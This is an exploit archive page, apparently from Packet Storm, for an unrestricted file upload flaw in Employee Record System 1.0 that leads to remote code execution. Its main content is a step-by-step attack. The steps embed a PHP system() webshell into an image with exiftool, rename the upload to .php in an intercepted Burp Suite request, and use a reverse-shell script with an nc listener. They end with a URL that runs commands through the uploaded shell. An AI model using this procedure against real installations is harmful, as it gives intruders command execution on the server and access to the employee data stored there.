exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Employee Record System 1.0 Shell Upload

Employee Record System 1.0 Shell Upload
Posted Jan 8, 2021
Authored by Saeed Bala Ahmed

Employee Record System version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 1f4a5de2446758fa6b5567e6d7538a9f646130b6562a5f45e210b83df76a14a3

Employee Record System 1.0 Shell Upload

Change Mirror Download
# Exploit Title: Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2021-01-05
# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on add Employee.
Step 3: Copy a php webshell from /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.php.jpg or embed a phpshellcode into an image using "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg, then rename the image to r0b0t.php.jpg
Step 4: Fill in the required details at Add Employee, to Upload Employee Photo, browse select the shell.php.jpg / r0b0t.php.jpg from your computer.
Step 5: Click upload and capture request in burpsuite. In burpsuite, find your uploaded file and rename it to a ".php" extenstion.
-----------------------------32746377659244340001584064316
Content-Disposition: form-data; name="employee_photo"; filename="r0b0t.php"
Content-Type: image/jpeg
------------------------------------------

Step 6: Forward the request in burpsuite and apply same technique to Upload Employee ID.
step 7: Once all webshells/payloads are uploaded in both "Upload Employee Photo" & "Upload Employee ID" fields, click on ADD RECORD to create the record.
Step 8: Navigate to All employees, click on view employee icon, once the page loads, start nc listener, right click on the employee icon, copy the image location and paste that in browser. You will either have a shell in nc listener or a full RCE through the uploaded image (http://localhost/record/uploads/employees_photos/gQZtGSJyYW4oijD_r0b0t.php?cmd=ls)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close